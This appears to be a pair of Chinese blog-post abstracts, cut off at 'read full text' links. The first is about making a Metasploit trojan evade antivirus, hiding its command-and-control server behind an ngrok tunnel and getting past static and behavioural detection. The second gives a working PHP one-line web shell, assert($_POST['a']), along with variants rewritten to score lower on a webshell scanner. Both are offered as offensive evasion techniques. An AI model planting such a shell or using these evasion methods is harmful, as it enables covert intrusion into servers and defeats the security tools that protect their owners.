摘要：本文讲述如何免杀msf木马并成功上线，主要内容包括隐藏c2、过静态查杀、过行为查杀 0x00. 隐藏c2 为了隐藏c2，我们这里使用了ngrok的内网穿透，获得了一个ngrok提供的域名（ngrok可在官网下载：https://ngrok.com/）： 执行以下命令，将本地4455端口映射到公网的端 阅读全文

摘要：首先一句话木马： <?php assert($_POST['a']); ?> D盾扫描，5级 分开写： 1 <?php 2 $a = "assert"; 3 $b = $_POST['a']; 4 $a($b); 5 6 ?> D盾扫描，4级 使用可变函数的技巧（PHP 支持可变函数的概念。这意味着 阅读全文